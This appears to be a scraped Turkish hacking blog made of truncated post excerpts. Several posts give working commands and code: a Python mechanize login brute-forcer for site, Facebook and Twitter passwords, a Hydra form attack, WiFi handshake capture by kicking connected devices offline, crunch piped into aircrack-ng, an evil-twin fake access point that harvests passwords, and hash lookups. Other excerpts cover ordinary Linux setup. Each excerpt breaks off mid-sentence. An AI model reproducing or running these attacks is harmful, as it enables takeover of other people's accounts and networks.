DICTOPEN

Python ile site şifresi kırmak için (Site Admin,Face,Twit vb..) aşağıdaki kodları bir metin editörüne kopyalayıp web.py adıyla kaydedin. import mechanize br=mechanize.Browser() br.set_handle_robots(False) br.addheaders=[('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")] dos=open("loginweb2.txt","w+") dos.write(br.open("http://web.example.com/login.php").read()) dos.seek(0) text=dos.read() site=raw_input("Web Site:") postmail=raw_input("Post Mail:") postpass=raw_input("Post Pass:") postformid=raw_input("Post Form id:") username=raw_input("User:") txt=raw_input("Password Txt:") br.open(site) br.select_form(nr=int(postformid)) br[postmail]="xxxxxx@gmail.com" br[postpass]="yyy1zzz2" data=br.submit() print "Error Post Url:" print br.ge

Terminal ekranını açın ve kodu aşağıdaki şekilde kullanın. Tırnak ile ayrılmış kısma kırmak istediğiniz juniper şifresini yazın. Unutmayın ki  bu kod şifre kırmaz. Sunucularda sizin verdiğiniz şifreyi arayıp daha önceden şifrelenmiş birebir benzer kodu aramaktadır. Bulursa size direk şifrenin çözülmüş halini verecektir. findmyhash JUNIPER -h "\$9\$LbHX-wg4Z" Juniper Nedir

Hydra sadece web sayfalarının şifrelerini kırmaz. Ssh, Ftp gibi birçok parolalı giriş ekranına atak yapmaya yarar. İp , browser kimliği gibi listeler kullanılabilinir ve filtreler aşılabilinir. Ama ben burada en basit kullanımından ve direk çalışan kod satırlarından bahsedeceğim. Sadece web sitelerinin admin panellerini değil üye giriş panelleride kırılabilir. Kişinin mail adresi, Face şifresi, twit şifresi gibi. Bilenler için direk kod satırı; hydra   www.example.com   http-form-post  " /login.php : kullanici =^USER^& sifre =^PASS^:Erro" -L admin.txt -P sifre.txt Bilmeyenler için adım adım anlatımı; Linux işletim sisteminizi açın. Kali Linux (Önerilir) Öncelikle /root dizininde admin.txt diye dosya açıp ,içerisine satır satır. Admin kullanıcı adı olabilecek ihtimalleri yazın. Örneğin: Admin admin Yonetici yonetici gibi. Sonra sifre.txt dosyası açıp içerisine olabilecek şifre ihtimallerini girin. Kendi siteniz üzerinde deneme yapıyorsanız 5,6 adet

Linux'ta ek bir yazılım kullanmadan terminal kod satırından Ftp sunucunuza bağlanabilir, dosya gönderip, dosya alabilirsiniz. Bir terminal kod satırı açın ve aşağıdaki işlemleri yapın. ftp ipadresi ftp yazıp bir boşuk bırakarak sunucu ip adresinizi yazıp enter'a bastıktan sonra. root: kod satırı gelip sizden kullanıcı adınızı girmenizi isteyecek Yazip enter'a bastıktan sonra. parola: kısmı gelicek. ve sizden şifrenizi isteyecektir. Parolanızıda yazıp enter'a bastıktan sonra artık sunucunuza bağlısınız. dos ortamında olduğu gibi cd komutu dir komutu ve ls komutu kullanılarak klasörlerde gezebilir, içeriğini listeleyebilirsiniz. Örnek: cd httpdocs, cd html, cd images vb.. get index.php komutu ile sunucudan bilgisayarınıza dosya çekebilir. put index.php komutu ilede sunucunuza dosya gönderebilirsiniz. get komutu kullanarak çekeceğiniz veriler otomatik olarak /root dizininize inecektir. ineceği yeri ayarlamak için; lcd /var/www/html komutunu ve

Linux'ta Python programlama diline mechanize kurulumu çok basittir python un kendi installeri kullanılarak kurulmaktadır. Bir terminal ekranı açıp aşağıdaki kodları yazın. Mechanize modülünü kullanarak profesyonel çalışan botlar yazabilirsiniz. Yani dilediğiniz kadar browserin kimliğini taklit edebilir. Rastgele değiştirebilir. Elinizdeki proxy ip sayısı kadar döngülere sokulup filtrelere girmeden işlem yapabilir, yaptırabilirsiniz. Bir web sayfasından veri çekebilir, veri girişi yapabilir. Hatta Web Admin Login sayfalarına password attack yapabilirsiniz. pip install mechanize yada easy_install mechanize Modülü kurduktan sonra ; Aşağıdaki kodları " kod.py " olarak kaydedin. Bu kısım önemli değil " deneme.py " olarakta kaydedilebilir. import mechanize for i in dir (mechanize):     print i bu kodları kaydettikten sonra. Terminal ekranına; python kod.py yazıp enter'a bastığınızda. Mechanize kodlarının özelliklerini ve kullanımını

Linux işletim sisteminde apache2 kurulumu yaparak php kodlarını yorumlanabilir hale getirebilirsiniz.Yani yazdığınız php kodu browser üzerinden çalıştırılabilir. Lokal ip ayarlarınızıda yaparsanız. Dünyanın diğer ucundan bile çalışabilir hale gelir. Php ve Mysql Kurulumu için Terminal Kod Ekranını açın. apt-get install mysql-server mysql-client bu komut mysql server ve client i kuracaktır.(Veritabanı) apt-get install apache2 Bu komut apache2 yani php yorumlayıcıyı kuracaktır. service apache2 start bu komut da kurulan programların çalışmasını sağlayacaktır. Test etmek içinde. Firefoxu açıp. http://localhost Linkine girebilirsiniz. Aynı zamanda /var/www/html/ dizinine giderek. index.php dosyanızı oluşturun. İçerisine; <?php echo("Merhaba"); ?> kodlarını yazıp kaydedin. Tekrar Firefox uygulamanızdan http://localhost/index.php adresine girip. Php sunucunuzun kurulu ve hazır olduğunu teyit edebilirsiniz. Ekrana Merhaba Yazısı gelecektir

Wifi Şifresi kırmak için Kali Linux'ta hazır gelen programları terminal kod satırıyla kullanarak kırabiliriz. İlk önce algoritmik olarak anlatayım. - Bir wifi ağı bulucağız. - Bulduğumuz ağın Mac adresini ve Kanal Numarasını not alacağız. - Bulduğumuz wifi nin Mac adresine sinyaller gönderip alıp bağlı olan bilgisayar ve telefonların mac adreslerini alıcağız. - Bulduğumuz ağın Mac adresini ve ona bağlı olan bilgisayar yada telefon gibi cihazlardan birinin Mac adresini kullanarak Wifi cihazından handshake yakalayacağız. Yani şifre taraması yapabilmemiz için gerekli wifi bağlantı dosyasını oluşturacağız. (Bu sırada Wifi ye bağlı olan saldırdığımız Telefon internetten düşecektir. Biz saldırmaya devam ettiğimiz sürece internet bağlantısı açılmayacaktır ve sürekli bağlanmaya çalışacaktır, bağlanmaya çalışırken handshake yakalamış olacağız.) - Ve artık Modeme şifre denemesi yapmaya hazırız. Saldırıyı başlatabiliriz. Kullanmayı bilenler için direk komutlar: crunc

Linux'ta Wifi himetini açmak ve kapamak için service  network-manager  start service  network-manager  stop komutlarını kullanınız. Eğerki bir wifi hack yada wifi dinleme gibi işlem yaptıktan sonra wifiniz kapandı ve açılmıyorsa. airmon-ng   check   kill airmon-ng   stop   wlan0 airmon-ng   stop   wlan0mon service  network-manager  start komutlarını kullanınız. airmon-ng  programı wifiyi kullandıktan sonra kapatmanız gerekirki internete bağlanmak için kullanacağınız hizmet başlayabilsin.

Burada yapacağımız işlem wifi şifresi kırmak değil. Sahte bir wifi ağı oluşturarak birinin o ağa bağlanmasını bekleyip şifreyi almak olacaktır. Tabiki aldığımız şifre de şifrelenmiş bir şekilde geleceği için. Elde ettiğimiz şifre verisini hızlı kırmak içinde bir işlem yapacağız. Kali linuxta sağ üst köşeden wifi ye tıklayarak çevrenizeki wifilerden birinin adını alın ve aşağıdaki komutları kullanın. Aldığımız ad UgurNetApart olsun 1.Adım dmesg komutunu giriniz. 2.Adım ls -l /etc/hostapd-wpe/ komutunu giriniz. 3. Adım nano /etc/hostapd-wpe/hostapd-wpe.conf komutunu girip. conf dosyasını düzenleyeceğiz. İçerisindeki ssid: kısmına sahte wifi adını yazacağız. UgurNetApart gibi. ctrl + O ile kaydedip,  Ctrl + x İle Çıkın 4. Adım airmon-ng check kill komutunu girin. Bu komut ağ servislerinin tamamını silip alıcı pozisyonundan verici pozisyonuna geçmemize olanak sağlayacaktır. 5. Adım hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf komutunu girip. sahte wifiy

Crunch komutu ile şifre üretip txt dosyasına kayıt edeceğimiz dosya boyutu; verdiğimiz ihtimallere göre Mb yada Tb büyüklüğünde olabileceği için: Şifresi zor olan sistemlere saldırı yaparken Dosyayı kayıt etmeden üretirken kırma denemesi daha mantıklı olabilir. Bunun için şu komutları kullanıcağız. Fakat bu denemeden önce bilmeyen arkadaşlar aşağıdaki linkten diğer şifre kırma şeklini okuyup öğrensinler. Wifi Şifre Kırma Wpa-Wpa2 Bunu okuduktan sonra devam edelim. Öncelikle crunch komutunu bu şekilde kullanmak için bulunduğu klasöre girmemiz gerekiyor. Terminal ekranından. İlerleyen zamanlarda yapacakları güncellemelerle. Bu hata düzelebilir. Terminal ekranını açın ve şu komutları girin. cd /usr/share/crunch bu komut bizi crunch klasörüne götürecek. root@kali:/usr/share/crunch# bu satıra geldikten sonra alttaki komutu girin. crunch 8 10 -f charset.lst ualpha | aircrack-ng  --bssid  A8:DA:F9:A0:AC:37  dosya-01.cap -w- bu komut charset.lst dosyasında kayıtlı ol

Crunch komutu kullanımı: Kali linux ile Wifi, Ftp, Web Admin, Ssh şifrelerini kırma işlemine başlamadan önce ilk önce şifre veri tabanınızı oluşturmalısınız. Yani içerisinde şifre ihtimallerinin olduğu .txt dosyamızı oluşturacağız. Crunch komutu bize kali linux üzerinde şifre ihtimallerini oluşturma işlemini yapmaktadır. Kendi şifre oluşturucumuzuda yazabiliriz. Python programlama dili kullanarak. Terminal ekranını açın : crunch 6 8  aeiou123  -o sifre.txt bu komut bize 6 ile 8 karakter arasında içinde a, e, i, o, u, 1, 2, 3 karakterleri olan tüm şifreleri üretecektir ve sifre.txt dosyasını oluşturup içine yazıcak. Kayıt etme ve oluşturma işini yapanda -o komutudur. Linux'ta Open işlevi görür.  Yada şifre saldırısı yapacağınız sistem hakkında bilginiz var varsayalım. Şifresi 7 haneden oluşuyor ve içerisinde harf ve sayıdan başka bişe yok. crunch   7   7  abcdefghijklmnoprstuvyzwx0123456789  -o  sifre.txt bize çok yüksek GB boyutunda dosya çıkaracaktır. Ama şifre

Öncelikle Linux ses kartı kurulumu konumuza bakın. Buradan Linux'ta ses kartınız kurulu olsada kulaklığı algılamayabiliyor. Hatta Ses ayarları kısmına girdiğinizde default yani ayarları tanımamış ve değiştirilemez halde oluyor. Bu problemi çözmek için terminal ekranını açın ve aşağıdaki kodu girin. pulseaudio - D   Bu kodu girdikten sonra ses ayarlarınız aktif olacaktır.

Linux'ta kurulum bittiğinde ses kartınız kurulmamış olabilir. İlk önce terminal ekranını açarak. apt-get update komutunu vererek apt-get i güncelleyelim. Sonra apt-get install alsa-utils -y bu komutu uyguladıktan sonra ses kartınız kurulacaktır. Ses gelmediyse bilgisayarı yeniden başlatabilirsiniz. Yada ses hizmetlerini yeniden başlatabilirsiniz.

Kali linuxta bu hatayı aldıysanız muhtemelen ekran kartınız kurulu olmadığından almışsınızdır. Fakat aşağıdaki kodu terminal ekranına yazarak giderilebilir. Wordlistlerle wifi şifresi kırmaya başlamadan öncede bu hatayı almış olabilirsiniz. Çünkü kullandığınız komut gpu kullanmaktadır. apt-get install oclhashcat Bu komut işe yaramaz ise ekran kartınızın linux driverini indirip kurmanız gerekicek. Driver aramadan önce şunlarıda deneyebilirsiniz. İntel İçin apt-get install xserver-xorg-video-intel Alternatif apt-get install mesa-utils

Md5 te olduğu gibi bununda kırılması imkansız kadar uzaktır. Hatta md5 ten çok daha zordur.Ama yine aynı yöntemlerle kırma işlemi denenebilir. ( Md5 Yöntem ) Kali linux terminal ekranında bu komutu kullanarak tüm md5 ve sha veri tabanlarında şifreyi taratabilir. Daha önceden kaydı varsa bulup size verebilir. Öncelikle aşağıdaki linkten bir Sha-1 Şifre oluşturalım. http://www.sha1-online.com/ Daha sonra oluşturduğumuz şifreli veriyi aşağıdaki kodla kırmayı deneyelim. Oluşturacağınız şifre deneme için basit olsun. Örneğin : "administrator" findmyhash   SHA256   -h   050f61a238cc006ebde9f281c354b304df959547 LDAP için; findmyhash LDAP_SHA1 -h " {SHA}cRDtpNCeBiql5KOQsKVyrA0sAiA= " -g Buradaki -g komutu şifre aramaya googleyi de dahil eder.

Md5 te ters mühendislik yapılması imkansızdır. Çünkü oluşturulan 32 haneli verinin çözüm anahtarı yoktur. Örnek Md5 Kodu : b5c0b187fe309af0f4d35982fd961d7e  Fakat daha önceden belirlenmiş şifre ihtimallerinin md5 le şifrelenmiş halini (milyonlarca hatta milyarlarca ihtimali) veritabanında kayıt edip karşılaştırılabilinir.   Kali Linux 'ta python ile yazılmış dünyadaki md5 veritabanlarının tamamında arama yapan bir komut mevcut. " findmyhash " Bu komutla linux'ta md5 şifresini kırmayı deneyebilirsiniz. Önce Md5 ile Şifreleme Yapalım : Md5 Oluşturucu Sitesine girip kolay bir şifre yazıp şifreleyin :  "1234" gibi yada  "asdfg" gibi. MD5 Decode Oluşturduğunuz kodu linux terminalinde aşağıdaki gibi yazıp enter a basın.Dünyadaki bilinen tüm md5 veritabanlarında benzer önceden oluştuurlmuş şifreli md5 ler arasında arama yapıp size sonuç verecektir. Linux Terminal Kodu : findmyhash MD5 -h 098f6bcd4621d373cade4e832627b4f6 Birden

Herhangi bir linux dağıtımında program kurmak için; Terminal Ekranına   apt-get   install  program_adi şeklinde komut verdiğimizde ismini verdiğiniz programı kuracaktır. Örnekler: Ftp Client İçin apt-get   install  filezilla Gelişmiş Editör İçin apt-get   install  editra Diğer Kullanımı sudo apt-get install filezilla Zaman zaman apt-get update komutu   kullanarak linux install komutumuzu güncellemiş oluruz ve kurulumlarda hata verme olasılığı azalır.

Python u kurmak için Linux terminal ekranını açın ve aşağıdaki kodu yazın. apt-get install python bu komut bilgisayarınıza python u kuracaktır. Python da program yazmak için bir text editorü açın ve kodlarınızı yazıp uzantısını   .py olacak şekilde kaydedin. Örnek : deneme.py Tekrar terminal ekranını açın ve komut satırına python deneme.py komutunu girin. Yazdığınız program satır satır yorumlanacak ve çalışacaktır. Örnek: deneme.py içeriği: print "Bir Sayı Giriniz" Python içerisinde birçok programcıkta hazır gelmektedir.Örneğin Md5 Şifre Tarayıcı Findmyhash programcığı komut satırında direk yazılarak kullanılmaktadır.

Bir nüfuz etme testi, gayriresmi kalem testi, güvenlik zayıflıklarını arayan ve bilgisayarın özelliklerine ve verisine potansiyel olarak erişen bir bilgisayar sistemine saldırıdır. Süreç, tipik olarak hedef sistemleri ve belirli bir hedefi tanımlar; daha sonra mevcut bilgileri inceler ve hedefe ulaşmak için çeşitli yollar üstlenir. Bir penetrasyon testi hedefi beyaz bir kutu (arka plan ve sistem bilgisi sağlar) veya kara kutu olabilir (yalnızca şirketin adı dışında temel bilgi verir veya hiç bilgi vermez). Bir penetrasyon testi, bir sistemin saldırıya karşı savunmasız olup olmadığını, savunmaları yeterli olup olmadığını ve testin hangi savunmayı yenerse (eğer varsa) yenilgiye uğrattığını belirlemenize yardımcı olabilir. Penetrasyon testinin ortaya çıkardığı güvenlik sorunları sistem sahibine bildirilmelidir. Penetrasyon testi raporları, organizasyona olası etkileri de değerlendirebilir ve riski azaltmak için önlemler önerebilir. Bir penetrasyon testinin hedefleri, kötü n